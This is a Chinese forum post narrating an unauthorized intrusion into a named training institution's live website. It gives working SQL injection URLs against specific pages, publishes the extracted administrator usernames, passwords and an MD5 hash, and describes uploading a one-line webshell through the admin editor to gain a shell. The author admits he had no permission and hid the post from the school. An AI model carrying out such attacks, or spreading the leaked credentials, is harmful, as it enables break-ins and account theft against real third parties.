HanDs
NO.2

[入侵交流] 记一次入侵佳鑫诺专接本培训机构的网站 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

周六周日刚上了2天高数 一看到高数就头疼。今天先放松会,突然想到之前在家找资料的时候无意间发现了佳鑫诺网站的一个注入。

 

在发表这个文章之前我把佳鑫诺一位老师的QQ先拉黑了,否则让他看见文章找到我就不好了,毕竟在他们这里学习。拿到权限后不会做坏事,我会用个小号QQ去通知他们,至于修不修复漏洞是他们的事了。

 

目标站:www.jxnedu.com   Asp的站  服务器为 IIS 6.0

 

同服务器有13个站 不过这次由于目标站的子站比较多所以直接从主站下手了 没有去旁

 edu1 

 

找到之前在家找到的那个注入地址的记录,然后就在网址的后面习惯性的加了一个’ 看存不存注入。http://www.jxnedu.com/zhuanjieben1/bbsneibu/new.asp?id=1689’(返回错误)报错

 

于是乎感觉有机会,继续and1=1   and 1= 2 进行判断看是否存在注入。

 http://www.jxnedu.com/zhuanjieben1/bbsneibu/new.asp?id=1689 and 1=1 返回正常http://www.jxnedu.com/zhuanjieben1/bbsneibu/new.asp?id=1689 and 1=2 返回错误(报错)

 

这说明可注入了。 接着继续去手工注入。

 http://www.jxnedu.com/zhuanjieben1/bbsneibu/new.asp?id=1689 order by 1正常

 

order by 1 到 order by 8 返回正常   order by 9返回错误(报错)。

 

于是构造:http://www.jxnedu.com/zhuanjieben1/bbsneibu/new.asp?id=1689 union select 1,2,3,4,5,6,7,8 from admin

 edu2 

表名为admin

下面接着爆管理的用户名和密码,字段一般就是 admin,username,password,uner,pwd 等等

试了几个字段名分别为admin 和 passwordhttp://www.jxnedu.com/zhuanjieben1/bbsneibu/new.asp?id=1689 union select 1,admin,password,4,5,6,7,8 from admin

 

最后爆出管理员的账号和密码为:jxn312  jxn312edu3 

下面就是找网站的后台了。

后台地址很大众化http://www.jxnedu.com/zhuanjieben1/bbsneibu/login.asp  edu4 

用刚才爆出来的账户jxn312  jxn312 登陆

突然发现这怎么看起来不像是一个后台 而是一个留言界面

继续往下看 在页面的下面看到了一个管理留言

 

 edu5edu6 

点开新闻管理进入后台。这个后台很简单,只有发表文章的功能。唯一可以利用的就是这个南方数据的编辑器了。edu7 

开始寻找编辑器样式的页面地址 :admin/southidceditor/admin_style.asp

根据上面这个地址得到实际地址为:http://www.jxnedu.com/zhuanjieben1/bbsneibu/!!163badi$/admin/southidceditor/admin_style.asp 但访问这个地址发现此页面被删除了。哎,一个没有用的后台,放弃此后台继续寻找其他目录下的站。

 http://www.jxnedu.com:80/zhongkaozw/jmvip/newmore.asp?id=1641此站也存在注入

 

通过注入得到管理的账号和密码同为:jxn312 jxn312  进入发现跳转到刚才那个站了

 http://www.jxnedu.com/zhongkaozw/jmvip/login.asp原来和刚才那个是一个站。edu8 

于是我想找找http://www.jxnedu.com/zhongkaozw 这个的后台

接着找到这个地址:http://www.jxnedu.com/zhongkaozw/admin/login.asp 我尝试用jxn312   jxn312这个账户登陆 结果成功登陆进去

 edu9 

登陆后台一看是 南方数据的后台  这种后台拿SHELL无非就是那么几种

发现可以添加cer后缀。

 edu10 edu11 

但发现在上传被删除了,接着在看数据库备份,发现也不可以 备份报错。

最后只能利用编辑器了

 edu12 edu13 

上传cer 一句话木马。传上去了 但无法访问!

 

悲剧 此后台又放弃,继续找其它目录。

 http://www.jxnedu.com/zhuanjieben发现了这个目录http://www.jxnedu.com/zhuanjieben/admin/login.asp后台地址

我尝试用刚才爆的其它子站的账户登陆结果密码错误。那么下面看下这个站有没有注入

最终找到一个注入:http://www.jxnedu.com/zhuanjieben/CompHonorBig.asp?id=43%20union%20select%201,username,password,4,5%20from%20adminedu14账号为:jxnedu

密码为MD5加密的:5bc1027c311ebcec

随后去CMD5解密得到明文密码:edu15 

然后成功用jxnedu  jxn312 这个账户登陆后台。又是一个南方数据的。

 

同样添加CER这个后缀

 edu16 

发现这个子站上传可用

 edu17 

成功上传一句话木马,然后用菜刀连接。edu18 

上传大马,拿到SHELL。

 edu19


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
一次 入侵 培训机构 网站
#1楼
发帖时间:2016-7-23   |   查看数:0   |   回复数:0
游客组